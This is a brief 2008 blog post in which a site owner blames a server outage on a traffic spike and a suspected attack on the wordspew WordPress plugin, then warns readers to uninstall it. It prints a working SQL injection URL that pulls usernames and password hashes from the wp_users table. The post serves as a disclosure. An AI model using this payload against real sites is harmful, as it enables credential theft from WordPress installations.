Mess with the best, die like the rest… 

Facebook

Tremendous trafic for today : Unique visitors or DDOS wordspew attack?

I sincerely appologies to my visitors as my server is down. I had receive 200 visitors per hour due to my previous post and also receive DDOS attack on wordspew plugin.

Pages-URL (Top 10)
127 different pages-url Viewed Average size Entry Exit
/jin/wp-content/plugins/wordspew/wordspew.php 150160 357 Bytes 254 1279


/blog/index.php 6647 38.02 KB 3436 1401


/jin/index.php 3701 22.25 KB 1274 275

After some research, i’ve found Flaw on wordspew.

 http://[target]/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

so i’ve remove the plugin. Anyone with wordspew, please un-install the plugin to avoid vulnerability

 

You must be logged in , to post a comment.

Home 2008 Tremendous trafic for today : Unique visitors or DDOS wordspew attack?
credit